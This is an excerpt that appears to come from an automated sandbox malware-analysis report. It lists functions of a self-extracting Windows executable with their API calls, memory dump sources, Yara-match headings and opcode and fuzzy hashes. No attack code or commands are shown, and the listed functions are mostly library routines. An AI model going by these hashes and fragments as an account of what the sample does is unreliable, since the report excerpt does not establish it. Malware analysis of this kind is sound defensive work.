                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: cd5470191b76ece5351cb57922d771aa330f7f96c3c4353b9fcd8b1a9b65410e
                                                              • Instruction ID: 1147349e7f4fe3725aa3fe95d75728fadf42758c8ba7dc641683bab533a8f2c7
                                                              • Opcode Fuzzy Hash: cd5470191b76ece5351cb57922d771aa330f7f96c3c4353b9fcd8b1a9b65410e
                                                              • Instruction Fuzzy Hash: B511A034900604EFDF307B61C804BAA77BDFB05366F1056A6E42EA51D0D7709D4A9B91
                                                              Function 00E9F6B4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00E98987,00000000,00000000,?,00E9F65B,00E98987,00000000,00000000,00000000,?,00E9F858,00000006,FlsSetValue), ref: 00E9F6E6
                                                              • GetLastError.KERNEL32(?,00E9F65B,00E98987,00000000,00000000,00000000,?,00E9F858,00000006,FlsSetValue,00EAC630,FlsSetValue,00000000,00000364,?,00E9E1D7), ref: 00E9F6F2
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E9F65B,00E98987,00000000,00000000,00000000,?,00E9F858,00000006,FlsSetValue,00EAC630,FlsSetValue,00000000), ref: 00E9F700
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 2c6034d9c8199c977fdc7bb1fd02bb238f266b6c2aefea8f16bb910580923ebb
                                                              • Instruction ID: d030c2a3510638b495e926f9e81331943907bcc05695b5f0d154e02f09dd3908
                                                              • Opcode Fuzzy Hash: 2c6034d9c8199c977fdc7bb1fd02bb238f266b6c2aefea8f16bb910580923ebb
                                                              • Instruction Fuzzy Hash: B30120327252369FDF214BB9AC84A967BA8FF197B57241631F906F7180DB20DC05C6E0
                                                              Function 00EA03A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E9E105: GetLastError.KERNEL32(?,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9E109
                                                                • Part of subcall function 00E9E105: _free.LIBCMT ref: 00E9E13C
                                                                • Part of subcall function 00E9E105: SetLastError.KERNEL32(00000000), ref: 00E9E17D
                                                                • Part of subcall function 00E9E105: _abort.LIBCMT ref: 00E9E183
                                                                • Part of subcall function 00EA04CE: _abort.LIBCMT ref: 00EA0500
                                                                • Part of subcall function 00EA04CE: _free.LIBCMT ref: 00EA0534
                                                                • Part of subcall function 00EA013B: GetOEMCP.KERNEL32(00000000,?,?,00EA03C4,?), ref: 00EA0166
                                                              • _free.LIBCMT ref: 00EA041F
                                                              • _free.LIBCMT ref: 00EA0455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorLast_abort
                                                              • String ID: @;
                                                              • API String ID: 2991157371-3452451375
                                                              • Opcode ID: d86bcd12dccc635443a84f0dc6853b73251399b248d15c45318fc0927be3aa18
                                                              • Instruction ID: 126968348bc1dbf583d2abf3d2997b953bac28a585b72c10dbc9f84aca88089b
                                                              • Opcode Fuzzy Hash: d86bcd12dccc635443a84f0dc6853b73251399b248d15c45318fc0927be3aa18
                                                              • Instruction Fuzzy Hash: 4731D631904208AFDB10DFA9D881B9DB7E4FF4E324F255099E614BF291EB71AE40CB50
                                                              Function 00E8FF8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E83887: _wcslen.LIBCMT ref: 00E8388F
                                                                • Part of subcall function 00E87D46: _wcslen.LIBCMT ref: 00E87D4E
                                                                • Part of subcall function 00E87D46: _wcslen.LIBCMT ref: 00E87D5F
                                                                • Part of subcall function 00E87D46: _wcslen.LIBCMT ref: 00E87D6F
                                                                • Part of subcall function 00E87D46: _wcslen.LIBCMT ref: 00E87D7D
                                                                • Part of subcall function 00E87D46: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E82E75,?,?,00000000,?,?,?), ref: 00E87D98
                                                                • Part of subcall function 00E8FE24: SetCurrentDirectoryW.KERNEL32(?,00E8FFD0,C:\Users\user\AppData\Local\Temp\RarSFX0,00000000,00ECFA3A,00000006), ref: 00E8FE28
                                                              • _wcslen.LIBCMT ref: 00E8FFE9
                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,00ECFA3A,00000006), ref: 00E90022
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\RarSFX0, xrefs: 00E8FFC6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                                              • String ID: C:\Users\user\AppData\Local\Temp\RarSFX0
                                                              • API String ID: 1016385243-711939567
                                                              • Opcode ID: 8e6ac64f94f3f076fefdc3ba36c86fb554879b7cc1fdf251b7b474ac8998cdab
                                                              • Instruction ID: ed6ac1682f51859d8c604499b9a3fdbcae7426e8917322d58d3c00177d4c287f
                                                              • Opcode Fuzzy Hash: 8e6ac64f94f3f076fefdc3ba36c86fb554879b7cc1fdf251b7b474ac8998cdab
                                                              • Instruction Fuzzy Hash: 94015E71D0021869DF25BBA49D4AEDE73FCAF08704F001466F649F2291EAB4D648CBA4
                                                              Function 00E84CA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadStringW.USER32(00E8165F,?,?,00E8165F), ref: 00E84CD8
                                                              • LoadStringW.USER32(00E8165F,?,?), ref: 00E84CEF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LoadString
                                                              • String ID: X+
                                                              • API String ID: 2948472770-3443634675
                                                              • Opcode ID: d4e3550ab6c91666b128d8b4ac5225f26587b7f91ecf576f2d0a9ddfdc22402c
                                                              • Instruction ID: 5f5c7355349a84811c483f3e07ec07e1acfabfa033f9deb3fa1b793dfc43cb94
                                                              • Opcode Fuzzy Hash: d4e3550ab6c91666b128d8b4ac5225f26587b7f91ecf576f2d0a9ddfdc22402c
                                                              • Instruction Fuzzy Hash: A8F0FE7211115ABFDF111F52DC08DAB7F6AFF193907004425FE0DA6131D6329821EB90
                                                              Function 00E82710 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E8386B: _wcslen.LIBCMT ref: 00E83871
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?), ref: 00E82737
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?), ref: 00E8276A
                                                              • GetLastError.KERNEL32(?,?), ref: 00E82787
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                              • String ID:
                                                              • API String ID: 2260680371-0
                                                              • Opcode ID: bdc66cdfa979fb2f32df619e89475f1d3dc5f1be776becfaeb7affee08aa5a9f
                                                              • Instruction ID: 3d7587345be0af5594bb68c1c1ec19b34cce81a18222d05c050bcf9ee6f277df
                                                              • Opcode Fuzzy Hash: bdc66cdfa979fb2f32df619e89475f1d3dc5f1be776becfaeb7affee08aa5a9f
                                                              • Instruction Fuzzy Hash: F60124316002106AEF217B764D89BFD339CAF0A788F08141AFB4EF60D0DB65DA848765
                                                              Function 00EA0213 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00EA0238
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              • Opcode ID: 8d4fd437e9b29dcfa3305cba9787bfa11feeb2d52195f03fd81f92f65e56dc3a
                                                              • Instruction ID: d9266879df498cca0d6ec3f2b750de8c5bdffba337db4a42346b8f8bef99c106
                                                              • Opcode Fuzzy Hash: 8d4fd437e9b29dcfa3305cba9787bfa11feeb2d52195f03fd81f92f65e56dc3a
                                                              • Instruction Fuzzy Hash: 87410B705043489FDF228E64CC84BFABBE9DB5A304F1414EDE59AAB142D235B949CF60
                                                              Function 00E9F8EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,6AE85006,00000001,?,000000FF), ref: 00E9F95D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 2568140703-3893581201
                                                              • Opcode ID: 29b8088bd5bd70bf504460dbfba1febd1b831f380259520b8aae89b205b49840
                                                              • Instruction ID: 779622655f399e758407487fcc252a7b82a663e84890a31833249090336cac1b
                                                              • Opcode Fuzzy Hash: 29b8088bd5bd70bf504460dbfba1febd1b831f380259520b8aae89b205b49840
                                                              • Instruction Fuzzy Hash: 0801E93250121DBBCF029FA1DC01EEE3F62EF4D764F115114FE0476161CA329931AB94
                                                              Function 00E9F88A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00E9EE8F), ref: 00E9F8D5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpin
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 2593887523-3084827643
                                                              • Opcode ID: 8b61a02f13750b522acf33019a3fbb97aa5bddeb63bd1f77f18fd5b6d707d97c
                                                              • Instruction ID: 735478b1183920e5c7caa0b557f25ed30ebd34e1400979f3e8a2cd85b709c48c
                                                              • Opcode Fuzzy Hash: 8b61a02f13750b522acf33019a3fbb97aa5bddeb63bd1f77f18fd5b6d707d97c
                                                              • Instruction Fuzzy Hash: 3BF09A71642318BBCF199F61EC06DAE7BA1EB8DB20B105165F8047A260CB316A209B94
                                                              Function 00E9F72F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Alloc
                                                              • String ID: FlsAlloc
                                                              • API String ID: 2773662609-671089009
                                                              • Opcode ID: 6d14f632facfcada22cd280cf5e9fcd8aaeade21c2bf6b0de8f09eb9dd55b816
                                                              • Instruction ID: 1d3c28fb849d6c12d196789bfc231a04670737e097b3edbb125abb5caae8caa1
                                                              • Opcode Fuzzy Hash: 6d14f632facfcada22cd280cf5e9fcd8aaeade21c2bf6b0de8f09eb9dd55b816
                                                              • Instruction Fuzzy Hash: 51E0E531B42318BF8B05AFA1AD0696EBBD4DB8EB20B215169F805BB250DD607E0586D9
                                                              Function 00E931E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 597c7ff31e6200c40201a35b6c78166c136c8abae55da439144cf1ccb4d493aa
                                                              • Instruction ID: 07986d9069bff09c265b00c2a523dae1b9228dc41ac91b05b36ad457ec417117
                                                              • Opcode Fuzzy Hash: 597c7ff31e6200c40201a35b6c78166c136c8abae55da439144cf1ccb4d493aa
                                                              • Instruction Fuzzy Hash: D0B012C129A24A7D394462E69C07CF701FCC0C0B10370713BB400F5281D8402D481031
                                                              Function 00E931F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 305db0f2769cfb656befbdd45d400bbd030a32d9c73e161ac9e9eebbebccd48a
                                                              • Instruction ID: f4115bf1075f58354ad7ea88d86427036268ab916eed30a90ec33eaf3326f245
                                                              • Opcode Fuzzy Hash: 305db0f2769cfb656befbdd45d400bbd030a32d9c73e161ac9e9eebbebccd48a
                                                              • Instruction Fuzzy Hash: B4B012C229A14E7D390462A69C07C7701FCC0C0B10370713FB400F5281D8402D085031
                                                              Function 00E931C6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 4716f5579066f8c5335b3dc901ab5e93a0366d25e65d1c05b606ba2b28eae720
                                                              • Instruction ID: e4227e49564e86df6b112818ede3b42d0766c876240f8d54ac1d5def5f3195b0
                                                              • Opcode Fuzzy Hash: 4716f5579066f8c5335b3dc901ab5e93a0366d25e65d1c05b606ba2b28eae720
                                                              • Instruction Fuzzy Hash: F7B012C129B14A7D3A0492A69D07C7701FCC0C0B10771703BB400F52C1D8402E090031
                                                              Function 00E931DA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: aed9eba815d201c1ac333ef71cc90fd40082f2f2d0b2d23a64dec0ab012e60fe
                                                              • Instruction ID: 339b906380d9fa0b470336b05d26082aec44f91c22aa48dfdf87074d74411505
                                                              • Opcode Fuzzy Hash: aed9eba815d201c1ac333ef71cc90fd40082f2f2d0b2d23a64dec0ab012e60fe
                                                              • Instruction Fuzzy Hash: 2EB012C129A14A7D3D0462B69C07C7701FCC0C0B10370B03BB800F5281D9402D081031
                                                              Function 00E931D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
